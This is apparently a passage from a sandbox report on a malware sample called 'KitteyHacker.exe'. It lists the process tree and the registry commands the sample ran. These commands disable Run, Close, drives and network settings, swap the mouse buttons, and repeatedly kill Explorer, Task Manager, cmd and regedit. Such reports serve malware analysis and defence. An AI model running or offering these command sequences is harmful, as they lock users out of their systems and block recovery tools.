      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_EnableDragDrop /t REG_DWORD /d 0 /F
      4⤵
      PID:848
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_MenuFavorites /t REG_DWORD /d 0 /F
      4⤵
      PID:1812
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowHelp /t REG_DWORD /d 0 /F
      4⤵
      PID:1204
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowNetPlaces /t REG_DWORD /d 0 /F
      4⤵
      PID:1508
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowHomegroup /t REG_DWORD /d 0 /F
      4⤵
      PID:1456
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_SearchPrograms /t REG_DWORD /d 0 /F
      4⤵
      PID:2040
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 1 /F
      4⤵
      PID:1516
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 1 /F
      4⤵
      PID:1964
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /F
      4⤵
      PID:2344
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /F
      4⤵
      PID:1676
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /F
      4⤵
      PID:880
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuLogoff /t REG_DWORD /d 1 /F
      4⤵
      PID:872
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /F
      4⤵
      PID:2576
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /F
      4⤵
      PID:2580
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /F
      4⤵
      PID:2664
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /F
      4⤵
      PID:2020
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /F
      4⤵
      PID:2552
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /F
      4⤵
      PID:2544
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /F
      4⤵
      PID:2560
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /F
      4⤵
      PID:1564
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /F
      4⤵
      PID:1588
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /F
      4⤵
      PID:2180
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /F
      4⤵
      PID:1584
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /F
      4⤵
      PID:2920
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /F
      4⤵
      PID:2140
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMMyDocs /t REG_DWORD /d 1 /F
      4⤵
      PID:2068
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /F
      4⤵
      PID:2856
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /F
      4⤵
      PID:2732
  - - C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\KitteyHacker.exe
      KitteyHacker.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: GetForegroundWindowSpam
      PID:2976
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2980
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3048
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1484
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2636
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1208
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1656
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2684
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1724
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2448
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2516
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1960
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2460
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:660
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1048
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1368
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:812
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:560
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1972
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1336
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2308
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1796
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2316
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1844
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1912
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:684
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2384
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1144
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2608
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1456
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2344
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2664
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1588
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2844
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2856
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1532
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:3024
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2840
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2928
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2744
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1580
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1236
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1388
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1648
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2648
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:628
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2628
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2196
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1596
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2640
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1208
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:320
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2192
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2232
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1364
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1280
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1860
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2044
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1896
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2300
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2416
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:400
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1384
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2340
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1264
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1840
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1884
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1416
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:684
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2112
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1144
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1576
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1964
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2040
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1944
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2344
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1564
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2520
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2472
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2264
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:3024
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1640
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2280
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1392
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2252
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1760
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1768
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3048
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1644
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2628
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1904
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2640
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2764
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1192
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1700
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:748
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1724
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2476
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2448
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1712
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2348
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1860
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2096
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1076
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:896
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1788
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1604
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:936
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:836
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:2924
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2704
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2932
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:300
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:916
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2412
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2308
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1848
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2432
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1836
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1912
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:964
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2116
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2016
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1744
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1492
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1516
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2188
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1488
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2552
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2548
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2180
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2732
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2124
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1640
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2744
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2204
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:3028
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1580
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1552
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1784
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:3000
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1976
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:1768
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2676
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
